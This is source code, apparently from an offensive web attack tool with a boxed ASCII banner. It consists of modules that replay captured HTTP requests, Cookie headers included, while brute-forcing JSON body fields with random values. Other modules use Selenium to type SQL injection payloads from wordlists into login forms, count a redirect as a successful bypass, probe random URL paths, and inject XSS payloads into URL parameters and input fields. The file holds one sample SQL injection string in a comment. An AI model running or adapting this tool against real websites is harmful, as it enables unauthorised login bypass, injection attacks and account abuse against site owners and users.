python_version = platform.python_version() 15 | code = response.status_code 16 | print(f""" 17 | ░░░▒▒▒▒▒▒▒▒▒ 18 | ░▒▓▓▓▓▓▓▓▓▒▒▒▒▒▒ 19 | ░▒▓▓▓█▓▓▒▒▓▒▓▒▓▓██▓▒ 20 | ░▒▒▓▓▓▓▓▒▒▒▒░░▒▓▓▓▓▓▓██░ 21 | ░▒▓▓▒▓▒▒▒▒▒▒▒▒░▒▓▓▓▓▓▓▓█▓▒ 22 | ░▒▒▓▒░▓▓▒▒▒▒▒▒░▒▒▓▓▓▓▓▓▓▓██▓ 23 | ░▒▓▒▒▒▒░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▓▓██░ 24 | ░▒░▒▒▓▒▒▒▒▓▒░░▒███▓▓▓▓▓▓▓▓▓█▓ 25 | ░▒░▒▒▓█░░░░░░░▒▓▓▓▓▓▓▓▓▓███▓▓▒ 26 | ▒░░▒▒▓█▒░░░░░░▓▓▓▓▓██████▓▓▓▓░ 27 | ░░░▒▓▓███▓▒░░▒▓███▓▓▓▓███▓▓▓▓░ 28 | ░░░░▒▓▓███████████████▓▒░ ▓█▒ 29 | ░░░▒▒▓███████████████▓░ ▓░ 30 | ░▒░░░░▒▒▓██████████▓▓▓▓░ 31 | ░▒▒▒▒▒░░▒▒▒▓▓████▓▓▒▒▓▓▒░ 32 | ░▒▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ 33 | ▒▓▒▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒ 34 | ░▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒░ 35 | ▒▒░▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░▒▒▒▒ 36 | ⟪===============================================⟫ 37 | ⟪ ⟫ 38 | ⟪ ░▒█▀▀▄░░▀░░▒█▀▀▄░░▀░░░░▒█▀▀▄░░▀░░█▀▀▄░█▀▄ ⟫ 39 | ⟪ 
░▒█▀▀▄░░█▀░▒█▀▀▄░░█▀░░░▒█▀▀▄░░█▀░█▄▄▀░█░█ ⟫ 40 | ⟪ ░▒█▄▄█░▀▀▀░▒█▄▄█░▀▀▀░░░▒█▄▄█░▀▀▀░▀░▀▀░▀▀░ ⟫ 41 | ⟪ ⟫ 42 | ⟪ - By Jeffrey Montanari ⟫ 43 | ⟪ - @alfredredbird1 ⟫ 44 | ⟪ ⟫ 45 | ⟪===============================================⟫ 46 | ⟪ ⟫ 47 | ⟪ OS:{platform.system()} Machine: {platform.machine()} ⟫ 48 | ⟪ ⟫ 49 | ⟪ Hostname: {socket.gethostname()} ⟫ 50 | ⟪ ⟫ 51 | ⟪ IP: {socket.gethostbyname(socket.gethostname())} ⟫ 52 | ⟪ ⟫ 53 | ⟪ Python Version: {Fore.YELLOW + python_version + Fore.RESET} ⟫ 54 | ⟪ ⟫ 55 | ⟪===============================================⟫ 56 | ⟪ ⟫ 57 | ⟪ Target: {url} ⟫ 58 | ⟪ ⟫ """) 59 | 60 | 61 | if code >= 400: 62 | print(f"⟪ Response: {Fore.RED + str(code) + Fore.RESET} ⟫ ") 63 | if code <= 380: 64 | print(f"⟪ Response: {Fore.GREEN + str(code) + Fore.RESET} ⟫ ") 65 | 66 | print("""⟪ ⟫ """) 67 | if count >= 1: 68 | print(f"""⟪ Input Elements: {count+pwd} ⟫""") 69 | print("⟪ ⟫") 70 | print(f"""⟪ Email Elements: {count} ⟫""") 71 | print("⟪ ⟫") 72 | if pwd >= 1: 73 | print(f"""⟪ Password Elements: {pwd} ⟫ 74 | ⟪ ⟫ 75 | ⟪===============================================⟫ 76 | ⟪ ⟫ """) 77 | 78 | 79 | 80 | 81 | 82 | 83 | def save_to_json(url, count): 84 | filename = "data/gueses.json" 85 | data = { 86 | "url": url, 87 | "count": count, 88 | "date": datetime.now().isoformat() 89 | } 90 | 91 | # Check if the file exists 92 | if os.path.exists(filename): 93 | # Load existing data 94 | with open(filename, "r") as file: 95 | existing_data = json.load(file) 96 | # Append new data 97 | existing_data.append(data) 98 | else: 99 | # Create a new list with the first data entry 100 | existing_data = [data] 101 | 102 | # Write the updated data to the JSON file 103 | with open(filename, "w") as file: 104 | json.dump(existing_data, file, indent=4) 105 | 106 | 107 | def display_formatted_text(text, max_line_length=54): 108 | """ 109 | Display text neatly with ⟪ and ⟫ around each line. 
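Lines will wrap to a new line if they exceed the max_line_length,
    and shorter lines will be padded with spaces to match the length.
    Parameters:
    - text: The text to format and display.
    - max_line_length: The maximum number of characters per line.
    """
    # Make sure the text is not None
    if text is None:
        text = ""

    # Split the text into words to manage line wrapping
    words = text.split()
    current_line = ""
    formatted_output = []

    for word in words:
        # Check if adding the next word exceeds the line length
        if len(current_line) + len(word) + 1 <= max_line_length:
            # Add word to the current line
            current_line += (word + " ")
        else:
            # Add the current line to formatted_output, trim trailing spaces, and pad
            formatted_output.append(f"⟪ {current_line.strip():<{max_line_length}} ⟫")
            # Start a new line with the current word
            current_line = word + " "

    # Add the last line if any remaining, and pad
    if current_line:
        formatted_output.append(f"⟪ {current_line.strip():<{max_line_length}} ⟫")

    # Print the formatted lines
    for line in formatted_output:
        print(line)


# Example usage for request analysis
def print_request_details(method, url, headers, body_data):
    """
    Print the method, URL, headers and body of a parsed request as boxed text.

    Parameters:
    - method: The HTTP method string taken from the request line.
    - url: The request URL.
    - headers: Mapping of header name to value; skipped when empty.
    - body_data: Parsed body; anything truthy is rendered with json.dumps.

    Every header value is printed verbatim, so a captured Cookie or
    Authorization header ends up in the terminal and in any log of it.
    """
    display_formatted_text(f"Request Method: {method}")
    print("⟪ ⟫")
    display_formatted_text(f"Request URL: {url}")

    if headers:
        display_formatted_text("Headers:")
        print("⟪ ⟫")
        for header, value in headers.items():
            display_formatted_text(f"{header}: {value}")
    print("⟪ ⟫")
    if body_data:
        display_formatted_text("Body Data:")
        print("⟪ ⟫")
        display_formatted_text(json.dumps(body_data, indent=2))
    else:
        display_formatted_text("No Body Data")
    print("⟪ ⟫")

--------------------------------------------------------------------------------
/modules/bireq.py:
--------------------------------------------------------------------------------
import re
import json
import requests
import random
import string
from modules.mods import *
################################################################
#
# THIS IS FOR TESTING
#
################################################################
def load_values(file_path):
    """Load search keys from a text file, one key per line.

    Surrounding whitespace is stripped and blank lines are skipped, so a
    trailing empty line in the file does not become an empty key.
    """
    with open(file_path, 'r') as file:
        return [line.strip() for line in file if line.strip()]


def save_value_to_file(file_path, key):
    """Append a key to the values file and report it on stdout."""
    with open(file_path, 'a') as file:
        file.write(f"{key}\n")
    print(f"⟪ Saved '{key}' to {file_path}.")


def analyze_request_file(request_file, values_file, inturl):
    """Parse a saved raw HTTP request and let the user edit its JSON body.

    Parameters:
    - request_file: Path of a text file holding one raw HTTP request
      (request line, headers, blank line, optional body).
    - values_file: Path of the key list read by load_values(); keys the
      user adds with 'custom' can be appended to it.
    - inturl: Base URL that is prepended when the request line carries a
      path instead of an absolute http:// or https:// URL.

    Returns a dict with "method", "url", "headers", "body" and
    "found_keys", or None when the file has no well-formed request line.
    """
    # Load keys to search for
    search_keys = load_values(values_file)

    with open(request_file, 'r') as file:
        # Read file content
        request_data = file.read()

    # Split request into headers and body (if any)
    try:
        headers_part, body_part = request_data.split('\n\n', 1)
    except ValueError:
        headers_part, body_part = request_data, None

    # Split the header lines
    header_lines = headers_part.splitlines()

    # Parse request line (e.g., "POST /api/Users/ HTTP/1.1").
    # An empty file or a request line without exactly three fields used to
    # raise here; returning None lets the caller's "no valid request
    # details" branch handle it.
    if not header_lines:
        return None
    request_parts = header_lines[0].split()
    if len(request_parts) != 3:
        return None
    method, url, _http_version = request_parts

    # Ensure the URL has a scheme
    if not url.startswith(('http://', 'https://')):
        url = inturl + url  # Update the host as needed

    # Parse headers
    headers = {}
    header_regex = re.compile(r'^(.*?):\s(.*)$')
    for line in header_lines[1:]:
        match = header_regex.match(line)
        if match:
            headers[match.group(1)] = match.group(2)

    # Try to parse body as JSON if content type indicates JSON.
    # Header names are matched case-insensitively and parameters such as
    # "; charset=utf-8" are ignored when comparing the media type.
    content_type = next(
        (value for name, value in headers.items() if name.lower() == 'content-type'),
        '',
    )
    media_type = content_type.split(';', 1)[0].strip().lower()
    body_data = None
    if body_part and media_type == 'application/json':
        try:
            body_data = json.loads(body_part)
        except json.JSONDecodeError:
            body_data = body_part  # Fallback to raw body if not JSON
    # extra space to make it look good
    print("""⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫
⟪ ⟫""")

    print_request_details(method, url, headers, body_data)

    # Search for keys in the body data
    found_keys = {}
    if body_data and isinstance(body_data, dict):
        for key in search_keys:
            if key in body_data:
                found_keys[key] = body_data[key]

    # Print out found keys and their values
    if found_keys:
        print("⟪========================================================⟫")
        print("\n⟪ Found keys and values in the body: ⟫")
        for key, value in found_keys.items():
            display_formatted_text(f"Found key: {key}, Value: {value}", 54)

        # Edit keys if the user chooses to do so
        while True:
            edit_key = input("\n⟪ Enter the key you want to edit or 'custom' to enter a new key (or 'exit' to stop editing): ")
            if edit_key in found_keys:
                new_value = input(f"⟪ Enter new value for '{edit_key}' (current value: {found_keys[edit_key]}): ")
                body_data[edit_key] = new_value
                print(f"⟪ Updated '{edit_key}' to: {new_value}")
            elif edit_key.lower() == 'custom':
                custom_key = input("⟪ Enter the new key you want to add or edit: ")
                custom_value = input(f"⟪ Enter the value for '{custom_key}': ")
                body_data[custom_key] = custom_value
                print(f"⟪ Added/Updated custom key '{custom_key}' with value: {custom_value}")

                # Option to save the custom key to the file
                save_choice = input(f"⟪ Do you want to save '{custom_key}' to {values_file}? (yes/no): ").strip().lower()
                if save_choice == 'yes':
                    save_value_to_file(values_file, custom_key)
            elif edit_key.lower() == 'exit':
                print("⟪ Stopping edits.")
                break
            else:
                print("⟪ Key not found. No changes made.")

    # Print modified body
    print("\n⟪ Modified Body Data:", json.dumps(body_data, indent=2) if body_data else "⟪ No Body")

    # Return request details for sending
    return {
        "method": method,
        "url": url,
        "headers": headers,
        "body": body_data,
        "found_keys": found_keys  # Include found keys for brute forcing
    }


def random_string(length=8, char_set=string.ascii_letters + string.digits):
    """Generate a random string of fixed length from the specified character set."""
    return ''.join(random.choice(char_set) for i in range(length))


def send_repeated_requests(request_file, repeat_count, inturl):
    """Send a modified request multiple times, with optional brute-forcing.

    Parameters:
    - request_file: Path of the raw request passed to analyze_request_file().
    - repeat_count: Number of requests to send.
    - inturl: Base URL used when the request line holds only a path.

    On each iteration the chosen body key is set to a fresh random value
    before the request goes out. Only GET and POST are sent. The headers
    parsed from the file, including any Cookie header, are replayed
    unchanged, and each response status and body is printed.
    """
    values_file = 'data/values.txt'  # Path to the file containing keys to search for
    # Without a timeout a silent peer blocks the loop indefinitely.
    request_timeout = 30
    request_details = analyze_request_file(request_file, values_file, inturl)

    if not request_details:
        print("⟪ No valid request details found. Exiting.")
        return

    method = request_details["method"]
    url = request_details["url"]
    headers = request_details["headers"]
    body_data = request_details["body"]
    found_keys = request_details["found_keys"]

    # Prompt for a key to brute force
    if found_keys:
        print("\n⟪ Keys available for brute forcing:")
        for idx, key in enumerate(found_keys.keys(), 1):
            print(f"{idx}. {key}")

        choice = input("\n⟪ Enter the number of the key you want to brute force or type 'custom' for a new key: ")
        if choice.lower() == 'custom':
            brute_force_key = input("⟪ Enter the custom key you want to brute force: ")
            save_choice = input(f"⟪ Do you want to save '{brute_force_key}' to {values_file}? (yes/no): ").strip().lower()
            if save_choice == 'yes':
                save_value_to_file(values_file, brute_force_key)
        else:
            try:
                index = int(choice) - 1
                # "0" or a negative number would otherwise wrap around and
                # silently pick a key from the end of the list.
                if index < 0:
                    raise IndexError(choice)
                brute_force_key = list(found_keys.keys())[index]
            except (ValueError, IndexError):
                print("⟪ Invalid choice. Exiting.")
                return
    else:
        print("⟪ No keys found for brute forcing.")
        brute_force_key = input("⟪ Enter a custom key for brute forcing: ")
        save_choice = input(f"⟪ Do you want to save '{brute_force_key}' to {values_file}? (yes/no): ").strip().lower()
        if save_choice == 'yes':
            save_value_to_file(values_file, brute_force_key)

    # Ask the user for the type of brute force
    print("\n⟪ Choose the type of brute force:")
    print("⟪ 1. Email format (e.g., user@example.com)")
    print("⟪ 2. Letters only")
    print("⟪ 3. Numbers only")
    print("⟪ 4. Mix of letters and numbers")
    brute_force_type = input("⟪ Enter the number of the brute force type: ")

    email_endings = []  # Initialize email endings list

    for i in range(repeat_count):
        print(f"\n⟪ Sending request {i + 1}/{repeat_count}...")

        # Randomize the value for the brute-force key based on the selected type
        if brute_force_key and body_data and isinstance(body_data, dict):
            if brute_force_type == '1':
                # Ask for email endings
                if not email_endings:
                    email_endings = input("⟪ Enter the email endings separated by commas (e.g., @parrot.com,@gmail.com): ").split(',')
                body_data[brute_force_key] = random_string(8) + random.choice(email_endings).strip()
            elif brute_force_type == '2':
                body_data[brute_force_key] = random_string(8, string.ascii_letters)  # Letters only
            elif brute_force_type == '3':
                body_data[brute_force_key] = random_string(10, string.digits)  # Numbers only
            elif brute_force_type == '4':
                body_data[brute_force_key] = random_string(8, string.ascii_letters + string.digits)  # Mix
            else:
                print("⟪ Invalid brute force type. Exiting.")
                return

        try:
            if method.upper() == 'POST':
                response = requests.post(url, headers=headers, json=body_data, timeout=request_timeout)
            elif method.upper() == 'GET':
                response = requests.get(url, headers=headers, params=body_data, timeout=request_timeout)
            else:
                print("⟪ Unsupported HTTP method. Only GET and POST are supported.")
                continue

            # Print response from the server
            print(f"⟪ Response {i + 1} Status Code:", response.status_code)
            print(f"⟪ Response {i + 1} Body:", response.text)
        except requests.RequestException as e:
            print(f"⟪ Request {i + 1} failed: {e}")

--------------------------------------------------------------------------------
/modules/scans.py:
--------------------------------------------------------------------------------
import os
import sys
import time
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import UnexpectedAlertPresentException, NoAlertPresentException
from bs4 import BeautifulSoup
from modules.mods import *
import requests
import string
import random
import json
from colorama import *

box_width = 49


# Function to create a fixed-width line bc it line wraps sometimes
def create_box_line(content, width, align="left"):
    """Return content padded to width - 4 characters inside the ⟪ ⟫ frame.

    align is "left", "right" or "center". Any other value is treated as
    "left"; the original fell through and returned None, which callers
    then printed as the text "None".
    """
    inner_width = width - 4
    if align == "right":
        padded = content.rjust(inner_width)
    elif align == "center":
        padded = content.center(inner_width)
    else:
        padded = content.ljust(inner_width)
    return f"⟪ {padded} ⟫"


def generate_random_string(length=8):
    """Return a random string of ASCII letters and digits of the given length."""
    # Define the characters to choose from: letters (uppercase and lowercase) and digits
    characters = string.ascii_letters + string.digits
    # Generate a random string by selecting random characters from the defined set
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string


def inject(url, driver, response, wordlist, payload, delay):
    """Fill the page's email and password fields with each wordlist entry.

    Parameters:
    - url: Page to load in the browser.
    - driver: Selenium WebDriver used for every page interaction.
    - response: Passed through to logo(); not otherwise used here.
    - wordlist: Not referenced in this function.
    - payload: Selects the input file: 0 or 1 reads dict/sql-common.txt,
      2 reads dict/sql-generic.txt, 3 reads dict/sql-time.txt.
    - delay: Not referenced in this function.

    Field selectors come from data/PassSelectors.txt and
    data/EmailSelectors.txt. After the queue has run, the browser's
    current URL is compared with url and a change is reported as a
    redirect and recorded through save_to_json().
    """
    # Initialize lists to store the actual WebElement objects
    email_elements = []
    password_elements = []
    # injection queue
    num = 0
    # Get the URL from the webdriver
    driver.get(url)

    try:
        # Find elements by ID and NAME for password inputs
        # Open the file and read each line into a list
        with open("data/PassSelectors.txt", 'r') as f:
            selectors = [line.strip() for line in f.readlines()]

        # Loop through selectors and attempt to find elements
        # selector list is in data/PassSelectors.txt
        for selector in selectors:
            try:
                # Check if it's an XPATH expression
                if selector.startswith('//*[@'):
                    elements = driver.find_elements(By.XPATH, selector)
                else:
                    # NOTE(review): the By.NAME result is overwritten by the
                    # By.ID lookup on the next line, so only ID matches are kept.
                    elements = driver.find_elements(By.NAME, selector)
                    elements = driver.find_elements(By.ID, selector)

                if elements:
                    password_elements.extend(elements)

            except Exception as e:
                print(f"Error finding elements for selector {selector}: {e}")
        # Remove duplicates by converting to a set and then back to a list
        password_elements = list(set(password_elements))

    except Exception as e:
        print(f"An error occurred: {e}")

    try:
        # same as code above but for emails ^
        with open("data/EmailSelectors.txt", 'r') as f:
            Eselectors = [line.strip() for line in f.readlines()]

        # Loop through selectors and attempt to find elements
        # selector list is in data/EmailSelectors.txt
        for selector in Eselectors:
            try:
                # Check if it's an XPATH expression
                if selector.startswith('//*[@'):
                    elements = driver.find_elements(By.XPATH, selector)
                else:
                    # NOTE(review): same overwrite as in the password lookup above.
                    elements = driver.find_elements(By.NAME, selector)
                    elements = driver.find_elements(By.ID, selector)

                if elements:
                    email_elements.extend(elements)

            except Exception as e:
                print(f"Error finding elements for selector {selector}: {e}")
        # Remove duplicates by converting to a set and then back to a list
        email_elements = list(set(email_elements))
    except Exception as e:
        print(f"An error occurred: {e}")

    # Count the elements
    pwd = len(password_elements)
    count = len(email_elements)

    # Call the logo function
    logo(url, response, count, pwd)
    # reading and deciding the payloads
    # Start from an empty list so that a payload value outside 0-3 no longer
    # raises NameError when `lines` is read below.
    lines = []
    if payload == 1 or payload == 0:
        if payload == 0:
            print(f"⟪ {Fore.RED + 'Using Defualt Wordlist' + Fore.RESET} ⟫")
            print("⟪ ⟫")
        with open('dict/sql-common.txt', 'r') as file:
            # Read all lines and add them to a list
            lines = file.readlines()

    if payload == 2:
        with open('dict/sql-generic.txt', 'r') as f:
            lines = f.readlines()

    if payload == 3:
        with open('dict/sql-time.txt', 'r') as f:
            lines = f.readlines()

    email_credentials = [line.strip() for line in lines]

    # email_credentials = ["admin' OR '1'='1'--", "user@example.com"]
    password_credentials = ["parrot"]

    # The original bands (<= 2, 20-39, >= 40) printed nothing for 3-19
    # entries; the count is now always shown.
    lenemail = len(email_credentials)
    if lenemail < 20:
        count_color = Fore.RED
    elif lenemail < 40:
        count_color = Fore.YELLOW
    else:
        count_color = Fore.GREEN
    print(f"⟪ Injections Loaded: {count_color + str(lenemail) + Fore.RESET} ⟫")

    print("⟪ ⟫")
    print("⟪ Injection Queue: ⟫")
    print("⟪ ⟫")
    for email in email_credentials:
        for password in password_credentials:
            try:
                # Send keys to the email elements
                for element in email_elements:
                    element.clear()
                    element.send_keys(email)

                print(create_box_line(f" {num}. {email}", box_width, "left"))
                num += 1

                # Send keys to the password elements
                for element in password_elements:
                    element.clear()
                    element.send_keys(password)

                # Press Enter after filling out the forms
                password_elements[0].send_keys(Keys.RETURN)

            except Exception as e:
                # Any error for this entry is ignored and the queue moves on.
                pass
            except KeyboardInterrupt:
                print("⟪ ⟫")
                print("⟪ Stopping... ⟫")
                print("⟪ ⟫")
                print(create_box_line(f"Last Injection: {Fore.RED + email_credentials[num - 1] + Fore.RESET}", 59, "left"))
                print("⟪ ⟫")
                print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫")
                # sys.exit instead of the site-provided exit(), which is not
                # guaranteed to exist outside an interactive session.
                sys.exit(1)

    # Wait for the page to potentially redirect
    # Check if the URL has changed (indicating a redirect)
    current_url = driver.current_url

    if current_url != url:
        print("⟪ ⟫")
        print("⟪===============================================⟫ ")
        print("⟪ ⟫")
        print(create_box_line(f"Working Injection: {Fore.YELLOW + email_credentials[num - 1] + Fore.RESET}", 59, "left"))
        print(f"⟪ ⟫")
        print(f"⟪ Redirection: ⟫")
        print("⟪ ⟫")
        print(f"⟪ {current_url} ⟫")
        if current_url != "":
            print("⟪ ⟫")
            print(create_box_line(f"Injection: {Fore.GREEN + 'Successful' + Fore.RESET}", 59, "left"))
            save_to_json(url, num)
            print("⟪ ⟫")
    else:
        print(create_box_line(f"Injection: {Fore.RED + 'Failure :(' + Fore.RESET}", 49, "left"))
    # Keep the browser open for 10 seconds before closing
    time.sleep(10)


def brute(url, driver, response):
    """Request 33 URLs formed from url plus a random 4-character suffix.

    Prints the index, the URL and the HTTP status code of each request.
    driver and response are not referenced in this function.
    """
    print("⟪===============================================⟫")
    print("⟪ ⟫")
    print("⟪ Bruting: ⟫")
    print("⟪ ⟫")
    for i in range(33):
        # Build the URL once. The original generated a second random suffix
        # for the printed line, so the output named a URL that was never
        # requested.
        target = url + generate_random_string(4)
        rq = requests.get(target)
        print(f"⟪ {i}. {target}: {rq.status_code} ⟫")


def subdomain(url, driver, wordlist):
    """Load url + "/" + entry for every wordlist line and list differing pages.

    Parameters:
    - url: Base URL; its page source is captured first as the reference.
    - driver: Selenium WebDriver used to load each page.
    - wordlist: Path of a text file with one entry per line.

    An entry's URL is printed when its stripped page source differs from
    the reference page. Entries are appended as paths to url.
    """
    driver.get(url)
    homecode = driver.page_source.strip()  # Strip whitespace from homepage code

    print("Home Page Source Captured.")

    with open(wordlist, 'r') as f:
        lines = f.readlines()

    for line in lines:
        line = line.strip()  # Strip whitespace from each line
        if not line:  # Skip empty lines
            continue

        newurl = url + "/" + line

        try:
            driver.get(newurl)
            domaincode = driver.page_source.strip()  # Strip whitespace from domain code
            print("⟪ ⟫")
            if homecode != domaincode:
                print(create_box_line(f"{newurl}", 49, "left"))

        except Exception as e:
            print(f"Error accessing {newurl}: {e}")


# Function to handle alerts and continue
def handle_alert(driver):
    """Print and accept the browser alert if one is open; otherwise do nothing."""
    try:
        # Switch to the alert and accept it
        alert = driver.switch_to.alert
        print("⟪ ⟫")
        print("⟪===============================================⟫")
        print("⟪ ⟫")
        print(f"⟪ Alert detected: {alert.text} ⟫")
        print("⟪ ⟫")
        alert.accept()
    except NoAlertPresentException:
        # No alert to handle
        pass


def xssScan(driver, url, mode=1):
    """Submit each line of dict/xss-common.txt and look for it in the page.

    Parameters:
    - driver: Selenium WebDriver used for every page interaction.
    - url: Target URL. In mode 1 the text "q=<entry>" is appended to it
      directly; in mode 2 the page is loaded once and its input fields
      are filled.
    - mode: 1 checks the "q" URL parameter, 2 checks every <input> element.

    Returns 1 when mode 2 hits an element it cannot interact with and no
    alert is open; otherwise returns None.
    """
    if mode == 1:
        print("⟪===============================================⟫")
        print("⟪ ⟫")
        print("⟪ Scanning For XSS In URL: ⟫")
        print("⟪ ⟫")

        with open('dict/xss-common.txt', 'r') as f:
            xss_payloads = f.readlines()

        param_name = "q"
        for payload in xss_payloads:
            # Construct the vulnerable URL by injecting payload into the parameter
            vulnerable_url = f"{url}{param_name}={payload}"

            # Open the URL in the browser
            # Stripped outside the f-string so the file also parses on
            # interpreters older than 3.12.
            shown = payload.strip('\n')
            print(create_box_line(f"{param_name}={shown}", 49, "left"))
            try:
                driver.get(vulnerable_url)
                time.sleep(2)  # Wait for the page to load

                # Handle any unexpected alerts
                handle_alert(driver)

                # Check if the payload is reflected in the page source
                # NOTE(review): payload still carries the newline from
                # readlines(), and a match only prints "0".
                page_source = driver.page_source
                if payload in page_source:
                    print(00)

            except UnexpectedAlertPresentException:
                # Handle the alert if it interrupts the execution
                handle_alert(driver)

    if mode == 2:

        driver.get(url)
        time.sleep(2)  # Wait for page to load
        with open('dict/xss-common.txt', 'r') as f:
            xss_payloads = f.readlines()

        # Find all input fields on the page
        inputs = driver.find_elements(By.TAG_NAME, 'input')
        inputCount = len(inputs)
        workingCount = []

        print("⟪ ⟫")
        print("⟪===============================================⟫")
        print("⟪ ⟫")
        print(f"⟪ Input Fields: {inputCount} ⟫")
        print("⟪ ⟫")
        # color based on payload count
        # The original bands overlapped at 8, printing the count twice.
        payload_total = len(xss_payloads)
        if payload_total <= 8:
            total_color = Fore.RED
        elif payload_total <= 16:
            total_color = Fore.YELLOW
        else:
            total_color = Fore.GREEN
        print(f"⟪ Payloads Loaded: {total_color + str(payload_total) + Fore.RESET} ⟫")

        print("⟪ ⟫")
        print("⟪===============================================⟫")
        print("⟪ ⟫")
        print("⟪ Payload Queue: ⟫")
        print("⟪ ⟫")

        # Inject payloads into all input fields
        for payload in xss_payloads:
            shown = payload.strip('\n')
            for input_field in inputs:
                try:
                    input_field.clear()  # Clear the field
                    input_field.send_keys(payload)  # Inject XSS payload
                    input_field.send_keys(Keys.RETURN)  # Submit the form or move to the next

                    time.sleep(2)  # Allow page to reload if necessary

                    # Check if the payload appears in the HTML
                    page_source = driver.page_source
                    if payload in page_source:
                        # True
                        print(create_box_line(f" {shown}", 49, "left"))
                        # append, not extend: extend added one list item per
                        # character and inflated the final count.
                        workingCount.append(payload)

                    else:
                        # False
                        print(create_box_line(f" {shown}", 49, "left"))

                except Exception as e:
                    # Check if an alert is present
                    try:
                        alert = driver.switch_to.alert
                        print("⟪ ⟫")
                        print(create_box_line(f" {shown}", 49, "left"))
                        alert.accept()  # Dismiss the alert

                    except Exception:
                        # Narrowed from a bare except so Ctrl-C still stops the scan.
                        print("⟪ ⟫")
                        print("⟪===============================================⟫")
                        print("⟪ ⟫")
                        print(f"⟪ {Fore.RED + 'Error!' + Fore.RESET} Can't Interact With Element! ⟫")
                        return 1

        print(f"Working Payloads: {len(workingCount)}")
--------------------------------------------------------------------------------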